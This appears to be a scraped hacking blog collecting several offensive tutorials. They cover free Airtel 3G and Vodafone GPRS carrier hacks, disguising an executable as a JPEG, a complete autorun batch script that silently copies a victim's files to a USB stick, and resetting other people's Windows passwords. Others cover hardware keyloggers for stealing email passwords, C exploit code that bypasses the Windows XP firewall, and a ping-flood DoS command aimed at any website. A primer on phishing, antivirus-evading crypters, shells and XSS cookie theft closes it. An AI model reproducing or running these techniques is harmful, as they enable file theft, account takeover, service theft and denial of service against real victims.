Pages

hack 3g airtel


Airtel Free 3G Hack : Use Free Airtel 3G Internet For Your Computer

Posted by king cobra at Saturday, September 03, 2011
 We have already discussed about Free Airtel GPRS hack on wildhacker, But now many network provider have launched 3G service. So today I am sharing this trick to hack airtel 3G plane on your computer. Actually this trick is shared by one of my postreader. He got 900kbps download speed with airtel 3g using this trick.

So friends this post is for you, by using these trick you can enjoy Airtel 3G service at free of cost on your computer.




Step 1: Connect via AIRTELMMS.COM(MOST IMPORTANT)..
            IF U WANT IT EASY THN GO TO DEVICE MANAGER..SELECT THE MODEM..IN ADVANCE TAB..IN COMMAND SIMPLY PASTE { +CGDCONT=1,"IP","AIRTELMMS.COM" } WITHOUT BRACKETS

Step 2: CREATE A DIALUP CONNECTION....

Step 3: IT WILL CONNECT...AS NO NETWORK ACCESS

Step 4: GO TO CONNECT TO..U WILL SEE CONNECTED...

Step 5: RIGHT CLICK ...LEFT CLICK PROPERTIES

Step 6: GO TO NETWORKING TAB

Step 7: CHECK ALL THE CHECKBOXES

Step 8: CLICK ON INTERNET PROTOCOL VERSION(TCP/IP)

Step 9: CLICK ON PROPERTIES

Step 10: SELECT USE THE FOLLOWING DNS SERVER ADDRESSES

Step 11: ENTER ANY FREE DNS SERVER..I RECOMMEND
              156.154.70.1
              202.138.96.3

Step 12: CLICK OK

Step 13:AGAIN OK

Step 14: A MSG APPEARS " SETTING WILL TAKE PLACE NEXT TYM U DIAL IT" CLICK OK

Step 15: GO TO START> CONNECT TO > DISCONNECT

Step 16: RECONNECT

Step 17: OPEN ANY WEBSITE ...........Enjoy Free Airtel 3G...

Above trick works at any balance with No Balance Deduction...

Credit : rajesh

So friends, I hope this Airtel Free 3G Hack tutorial will be useful for you. If you have any problem in this Airtel Free 3G Hack tutorial, please mention it in comments otherwise mail rajesh at (rrulerofkings@gmail.com ).

Enjoy Airtel 3G hAcKiNg…

hide exe file in jpeg image



1. First Step, Create a new folder and please check that "Show hidden files" is checked and "hide extensions for known file types" is unchecked in folder options.

2. Copy your exe file source in that folder for example called first.exe.

3. Now you have to rename this first.exe file to whatever you want. Here suppose you are renaming it to second.jpeg. When you trying to renaming it windows will warn you like if you really want to change this extension from exe to jpeg, then click on YES.

4. Now create one shortcut of secong.jpeg in same folder and renaming shortcut to whatever you want suppose you are renaming it to third.exe.

5. Now right click on third.exe and go to properties, Here you have to do some changes mentioned below.

6. Delete all things which are present in start in field and leave it empty.

7. Now in this step you have to write the path to open other files second.jpeg like this: C:\WINDOWS\system32\cmd.exe /c second.jpeg

8. The last field, c second.jpeg is always the name of the first file. If you called the first file demo.avi then you you have to write
C:\WINDOWS\system32\cmd.exe /c demo.avi

9. Now here what you are doing is So what you are doing is when someone clicks on third.jpeg, a command will execute the other file second.jpeg and the source will run.

10. Now right click on third.jpeg, go to properties and then you will see one option to change your icon. Click this and then a new window will open. You have to write this : %SystemRoot%\system32\SHELL32.dll and then press OK.

11. All things are done but you have to remember two things in your mind that these 2 files must be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

ask if u have any Question in comment box

autorun virus that steals files with usb


Autorun virus that steals files with a USB

Posted by king cobra at Wednesday, October 13, 2010
What i am going to teach you is how to make an autorun virus that steals files as soon as its plugged into a computer this is not

harmful to the other persons computer at all.

OK so first plug in your usb then navigate your way to it.
Then we are gonna copy and paste this batch code that will steal the files

IF WINDOWS XP USE THIS BATCH

Code

@echo off
:CHECK
if not exist "%&&&&%\Copied_files" md "%&&&&%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR


:COPIER
if not exist "%&&&&%\Copied_files\%computername%" md "%&&&&%\Copied_files\%computername%"
if not exist "%&&&&%\Copied_files\%computername%\VIDEOS" md "%&&&&%\Copied_files\%computername%\VIDEOS"
if not exist "%&&&&%\Copied_files\%computername%\PICTURES" md


"%&&&&%\Copied_files\%computername%\PICTURES"
if not exist "%&&&&%\Copied_files\%computername%\MUSIC" md "%&&&&%\Copied_files\%computername%\MUSIC"
if not exist "%&&&&%\Copied_files\%computername%\DOWNLOADS" md


"%&&&&%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%&&&&%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%&&&&%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%&&&&%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%&&&&%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%&&&&%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit


IF VISTA OR WINDOWS7 USE THIS BATCH

Code :

@echo off
:CHECK
if not exist “%&&&&%\Copied_files” md “%&&&&%\Copied_files”
if exist “%systemdrive%\files” goto COPIER7
goto ERROR
:COPIER7
if not exist “%&&&&%\Copied_files\%computername%” md “%&&&&%\Copied_files\%computername%”
if not exist “%&&&&%\Copied_files\%computername%\VIDEOS” md “%&&&&%\Copied_files\%computername%\VIDEOS”
if not exist “%&&&&%\Copied_files\%computername%\PICTURES” md


“%&&&&%\Copied_files\%computername%\PICTURES”
if not exist “%&&&&%\Copied_files\%computername%\MUSIC” md “%&&&&%\Copied_files\%computername%\MUSIC”
if not exist “%&&&&%\Copied_files\%computername%\DOWNLOADS” md


“%&&&&%\Copied_files\%computername%\DOWNLOADS”
copy /y “%userprofile%\Documents\*.*” “%&&&&%\Copied_files\%computername%”
copy /y “%userprofile%\Videos” “%&&&&%\Copied_files\%computername%\VIDEOS”
copy /y “%userprofile%\Music” “%&&&&%\Copied_files\%computername%\MUSIC”
copy /y “%userprofile%\Pictures” “%&&&&%\Copied_files\%computername%\PICTURES”
copy /y “%userprofile%\Downloads” “%&&&&%\Copied_files\%computername%\DOWNLOADS”
MSG %username% “DONE!”
exit
:ERROR
exit

Now replace &&&& with the name of your usb. For example my usb's name is Firesale.
Then save it as Filestealer.bat or whatever you want.

How this batch file works is that it uses the MD command or the Make Directory command to make the Copied_files folder and the

files inside it. Then it navigates its way to the selecected folders and pastes them there.

Now to make this file autorun when we plug it in we are going to have to make another txt file.
Now open this file and inside paste this

Code:
[autorun]
Open=&&&&.bat
Action=File Copier

So now replace the &&&& with whatever u saved the batch file as.
Now we are gonna save it as autorun.inf

And then take your usb out and plug it back in and the files will be copied.
If there not automatically copied there will be an interface with option like "play with music player" and "read only" scroll down and u will find File copier
If you have any questions please ask!

Any rep is apreciated

how to hack windows administrator password


How to Hack Windows Administrator Password

Posted by king cobra at Saturday, September 11, 2010
This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.

You do not need to know the old password to set a new one
Will detect and offer to unlock locked or disabled out user accounts!
There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.


Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)

2. Now type net user and hit Enter

3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows

4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

how to hack e-mail using hardware keylogger

how to hack e-mail using hardware keylogger

How to Hack an Email using Hardware Keylogger

Posted by rajesh at Saturday, September 11, 2010
http://realhackingtips.blogspot.com/2010/07/best-myspace-facebook-hacking-software.htmlDid you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use. I will also teach how to hack an email using hardware keylogger.
More information about Keylogger click here

A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.

Now I’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.



So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify it as a keylogger.


Insatalling a Hardware Keylogger to Hack the Email Password

The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.



Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the logs are stored.

bypassing windows-xp fire wall

Bypassing Windows-XP Firewall

Posted by king cobra at Thursday, September 30, 2010
There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zipVulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h" int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

DoS Attack With Your Home Pc

DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

How To Send DoS Attack With CMD

Posted by king cobra at Monday, September 06, 2010
DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

------------------------
DoS Attack Stands For Denial of Service Attack
------------------------
What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type
--------------------------------------------------
nslookup Site-Name
--------------------------------------------------
(e.g nslookup www.google.com)

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

Complete HACKING information for newbies

Complete HACKING information for newbies




Introduction:

We see a millions of people going to different forums and websites and asking "how do i hack an email?", "Can you hack blah for me?". So thought to create a tutorial which will give you the basic idea about what the heck is a "HACK", and how to DEFEND YOUR SELF AGAINST HACKERS.

Background:

Hacking started way too far when the windowsd 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses.

Things to remember

I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN.

Initialization:

Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

1. Email or the user information
2. Web based hacking.

These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

a.   Phishing
b.   Brute Forcing
c.   Keylogging
d.   Trojans

A: Phishing:

Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.

Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?

Disadvantages:

Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.

B: Brute Forcing:

Brute forcer is basically a program which could be called as a "cracker". In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like "huge pass list" on different forums, they are nothing but the password list to put into your bruteforcer.!

Disadvantages:

1. Sometimes brute forcing may just go for ages!
2. It isnt guaranteed
3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect
4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the "image captcha" after 3 incorrect login attempts, which stops the bruteforcer.

C: Keylogging :

Keylogger helps you to create a little filed which is known as "server". You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.

Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim's computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information

Disadvantages :

1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.
2. Sometimes firewall blocks the keylogs from being sent.

Tips :

1. There are some programs which are known as "crypters" which will help you to make your server's undetectable. So your victim's anti-virus would not be able to detect them.

D: Trojans :

Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim's computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..

Disadvantages :

Same as keyloggers.

Tips :

Same as keylogger.

I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1 : SQL Injection :

Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.

So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website!

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:
        
Code:
yoursite.com/index.php?id=545

just add a ' like this at the end

Code:
yoursite.com/index.php?id=545'

 2 : XSS :

XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up.

3. Shells :

Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire "FTP" account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
This is also known as deface.

4. RFI :

RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:

Vodafone Hack For Free GPRS

 Vodafone | hutch free gprs hack – enjoy free grps on vodaphone.

Now everyone wants to use GPRS on phone, especially if it is free. I found a nice hack to get a free GPRS via Vodaphone.This method has been tested on different mobiles and has been confirmed to be working.




rajesh
                                                                                                                                                                                     Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point Settings :
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings :
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:

Proxy Port: 9401